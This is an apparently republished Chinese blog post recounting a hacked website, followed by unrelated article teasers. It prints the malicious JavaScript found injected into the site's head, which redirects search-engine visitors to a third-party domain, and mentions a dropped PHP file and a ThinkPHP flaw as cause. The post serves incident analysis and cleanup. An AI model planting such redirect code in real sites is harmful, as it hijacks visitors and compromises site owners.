记一次网站被黑经历

news/2024/5/13 4:54:03/文章来源:https://blog.csdn.net/weixin_33953384/article/details/92247479

问题原由

早上突然接到客户电话,网站在微信中无法打开,被微信拦截
记一次网站被黑经历

在pc端访问网站,点击首页中任何一个url都会跳转到第三方网站,恍然大悟,网站是被黑了

问题分析

发现网站head被加入一下代码
记一次网站被黑经历

发现js里面代码的如下,会强制跳转到第三方网站:

(function () {/*百度推送代码*/var bp = document.createElement('script');bp.src = '//push.zhanzhang.baidu.com/push.js';var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(bp, s);/*360推送代码*/var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';document.write('<script src="' + src + '" id="sozz"><\/script>');})();document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://2019d2.com\";");
document.writeln("</script>");

打开阿里云虚拟主机,ftp连接到虚拟主机,发现:

  • 网站根目录多了一个文件:coonig.php,且此文件无法修改无法删除
  • index.php文件被修改

记一次网站被黑经历

解决方法

  1. 提交阿里云工单,让阿里云后台人员删除coonig.php文件
  2. 将index.php替换掉

本次被黑是由于thinkphp漏洞导致,详见
http://www.thinkphp.cn/topic/61303.html

后续

有没有小伙伴知道如何快速举报一个网站?

转载于:https://blog.51cto.com/13990437/2383267

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_822021.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

免费编程资源----网站篇

免费编程资源----网站篇

编程是一项必学功能&#xff0c;没必要拿着枯燥的书本在那里死啃&#xff0c;而是即刻动手才能学得快。所以我们要来看看这些免费编程资源。 1. Code/Racer Code/Racer是一个在线编程游戏&#xff0c;会强迫你快速编程&#xff0c;在编程游戏中&#xff0c;Code/Racer所属Treeh…
阅读更多...
java setseed,基于webmagic的种子网站爬取

java setseed,基于webmagic的种子网站爬取

1. 概述因为无聊&#xff0c;闲来没事做&#xff0c;故突发奇想&#xff0c;爬个种子&#xff0c;顺便学习爬虫。本文将介绍使用Spring/Mybatis/webmagic等框架构建项目并爬取种子磁链。2. 项目搭建如下图为本项目的工程结构&#xff0c;主要代码实现在Spider包中。3. 数据库设…
阅读更多...
外国优秀网页html,200个优秀的国外设计网站推荐

外国优秀网页html,200个优秀的国外设计网站推荐

这个系列向大家推荐了200个优秀的国外设计网站&#xff0c;包括网页设计、名片设计、Logo设计和包装设计等等&#xff0c;设计师们可通过这些网站收集的优秀设计作品来获取灵感&#xff0c;进而设计出更具有创意的作品&#xff0c;设计师们也可以把自己得意的作品提交到这些网站…
阅读更多...
Linux-运维网站综合架构分析

Linux-运维网站综合架构分析

前言 如何规划一个网站的架构是十分重要的&#xff0c;一个好的网站架构可以给网站带来安全性&#xff0c;维护更加简单&#xff0c;服务更加稳定等等… 接下来便简要简述一下&#xff0c;一个网站的架构内容&#xff0c;其中涉及的服务器与所需软件 正文 集群架构概念图示 …
阅读更多...
java无法验证证书_如何解决“证书无效,不能用于验证本网站的身份”错误?...

java无法验证证书_如何解决“证书无效,不能用于验证本网站的身份”错误?...

问题是&#xff0c;如何解决“证书无效并且不能用于验证本网站身份”的错误&#xff1f;。如何解决“证书无效&#xff0c;不能用于验证本网站的身份”错误&#xff1f;下面是详细信息&#xff1a;我有一个签名的小已经工作正常&#xff0c;直到我更新Java来8u25(1.8.0_25-B18)…
阅读更多...
HTML制作菜鸟教程网站首页

HTML制作菜鸟教程网站首页

这是我们要制作的网站首页 我们接下来将分块进行解析: 顶端模块: 我们将顶端模块分为两个div,分别通过float属性和margin属性达到我们想要的布局效果. 此处我试用的高和宽皆为像素定值,实际很多地方高都不需为定值,使其根据内容自适应大小即可.因为是像素设置的原因,所以当浏…
阅读更多...
boot入门思想 spring_SpringBoot入门建站全系列(二十一)Mybatis使用乐观锁与悲观锁...

boot入门思想 spring_SpringBoot入门建站全系列(二十一)Mybatis使用乐观锁与悲观锁...

SpringBoot入门建站全系列&#xff08;二十一&#xff09;Mybatis使用乐观锁与悲观锁一、概述之前有两篇《SpringBoot入门建站全系列&#xff08;三&#xff09;Mybatis操作数据库》和《SpringBoot入门建站全系列&#xff08;四&#xff09;Mybatis使用进阶篇:动态SQL与分页》介…
阅读更多...
cdn对php网站的加速效果,配置七牛自定义域名cdn加速,让你的网站飞起来

cdn对php网站的加速效果,配置七牛自定义域名cdn加速,让你的网站飞起来

之前发过一篇是没有备案的&#xff0c;使用测试域名来缓存静态文件&#xff0c;效果也是杠杠的。如果你还没有备案&#xff0c;先看这篇文章吧&#xff0c;域名没备案使用七牛cdn加速 。步入正题了(为了节约博主发文的时间&#xff0c;尽量少用文字&#xff0c;多以图片展示&am…
阅读更多...
360网站卫士能防服务器吗,360网站卫士测评

360网站卫士能防服务器吗,360网站卫士测评

最近小编的主机商在主机控制后台开通了360网站卫士的功能&#xff0c;在了解了一些关于360网站卫士的功能之后&#xff0c;本站开始试用这款用于保障免受攻击&#xff0c;在开通一周之后&#xff0c;小编就来所说对这款360网站卫士应用的试用感受!首先让小编感受最为深刻的是“…
阅读更多...
服务器绑定网站域名,服务器网站绑定域名

服务器绑定网站域名,服务器网站绑定域名

服务器网站绑定域名 内容精选换一换这个是浏览器的设置&#xff0c;没绑定SSL证书的&#xff0c;访问都会有这个提示。您可以为您的网站添加SSL证书。不一定。如果您需要通过HTTPS协议访问网站&#xff0c;就需要添加SSL证书&#xff0c;云速建站支持第三方免费SSL证书的添加。…
阅读更多...
大型网站架构技术演进(史上最全)

大型网站架构技术演进(史上最全)

1. 概述 本文以淘宝作为例子&#xff0c;介绍从一百个并发到千万级并发情况下服务端的架构的演进过程&#xff0c;同时列举出每个演进阶段会遇到的相关技术&#xff0c;让大家对架构的演进有一个整体的认知&#xff0c;文章最后汇总了一些架构设计的原则。 2. 基本概念 在介…
阅读更多...
制作网站代码_网站制作的六个流程,一个都不能少

制作网站代码_网站制作的六个流程,一个都不能少

随着时代的发展&#xff0c;有新企业的诞生必然会伴随着旧企业的倒闭&#xff0c;新企业的成立必然会有网站制作的需要&#xff0c;那么这个网站制作的作用就不言而喻了&#xff0c;可以宣传企业的文化&#xff0c;加强企业在互联网上的传播。当然了&#xff0c;新建站的公司必…
阅读更多...
python django 如何部署_【实战演练】Python+Django网站开发系列02-Django完整开发环境部署...

python django 如何部署_【实战演练】Python+Django网站开发系列02-Django完整开发环境部署...

#本文欢迎转载&#xff0c;转载请注明出处和作者。上一篇我们讲到已经安装好了python3.8.1与django框架&#xff0c;并且直接启动了服务&#xff0c;但是目前并没有任何我们自定义的内容。我们网站开发的最终目标&#xff0c;是开发出一个简单的学生选课管理系统。系统需求&…
阅读更多...
设计电子商务网站建设方案_成都婚纱摄影网站建设规划设计方案!

设计电子商务网站建设方案_成都婚纱摄影网站建设规划设计方案!

婚姻生活是人生道路中的一件大事儿&#xff0c;现阶段婚纱摄影行业相关的企业慢慢转型&#xff0c;大家对婚纱照的要求也逐渐转型为人性化、多元化,伴随着互联网的转型及当代生活的节奏,传统式的拍摄方法已逐渐被替代,成都婚纱摄影网站建设也是能快速获取顾客关注度十分重要的一…
阅读更多...
网站迁移到新服务器的步骤_怎样将网站迁移至云服务器?需要注意什么?

网站迁移到新服务器的步骤_怎样将网站迁移至云服务器?需要注意什么?

经历过虚拟主机、VPS的使用&#xff0c;也慢慢从什么都不太熟悉的新用户变成了老油条&#xff0c;我知道&#xff0c;很多人把网站从日渐熟悉的传统服务器迁移到云服务器时&#xff0c;心里或多或少不是滋味&#xff0c;有不舍&#xff0c;当然更多的是未知的担忧。所以&#x…
阅读更多...
eclipse复制代码连接数据库404_什么是404页面,404页面对网站有什么影响

eclipse复制代码连接数据库404_什么是404页面,404页面对网站有什么影响

我们在浏览网页的时候&#xff0c;经常会在打开网页的时候发现上面大大的写着一个 “404”字样的页面&#xff0c;而且显示“你所浏览的页面已经不在了”这样的页面到底有什么样的含义呢&#xff1f;又对网站有什么样的影响&#xff1f;404页面是客户端在浏览网页时&#xff0c…
阅读更多...
oracle19删除之前的主目录用户_百度搜索暂停快照删除服务,是否影响SEO优化?...

oracle19删除之前的主目录用户_百度搜索暂停快照删除服务,是否影响SEO优化?...

短视频&#xff0c;自媒体&#xff0c;达人种草一站服务最近据百度官方公告显示&#xff0c;百度百度快照投诉删除入口目前暂停关闭&#xff0c;官方系统批量删除快照业务暂时停止服务&#xff0c;未来网页快照删除和更新问题&#xff0c;需站长们个人手动到百度网页搜索结果底…
阅读更多...
textview 大小自适应_上海自适应网站建设注意要点有哪些-回声网络

textview 大小自适应_上海自适应网站建设注意要点有哪些-回声网络

上海自适应网站建设注意要点有哪些&#xff1f;随着智能手机的普及&#xff0c;移动互联网发展也越来越快速。对于企业来说&#xff0c;仅仅只有一个PC站肯定是不行了&#xff0c;而为了节约成本和方便管理&#xff0c;自适应网站建设也就越来越受欢迎。相较于普通的PC站&#…
阅读更多...
nicetool好工具_上进青年研习社丨这6个工具合集网站,抵过上百个软件!

nicetool好工具_上进青年研习社丨这6个工具合集网站,抵过上百个软件!

文丨小渔不知道你们有没有这样的经历&#xff1a;为了一些小的需求&#xff0c;在手机上或是电脑上下了一堆软件。虽然用过觉得也挺好用的&#xff0c;但是平时的使用频率真的不高啊。等你把它们都卸载了&#xff0c;过了一段时间突然又需要用它了。所以&#xff0c;今天小渔要…
阅读更多...
百度小程序读取服务器数据,百度小程序如何进行异步获取网站数据

百度小程序读取服务器数据,百度小程序如何进行异步获取网站数据

近期百度小程序是非常热门的&#xff0c;越来越多的企业都开始加入到百度小程序的正营来&#xff0c;对于百度小程序的开发过程中也难免需要去请求网站的数据&#xff0c;其实对于百度小程序请求网站的数据和微信小程序请求网站的数据操作是一样的也没有太大的区别。下面站优云…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发 尧图建网站 广利置业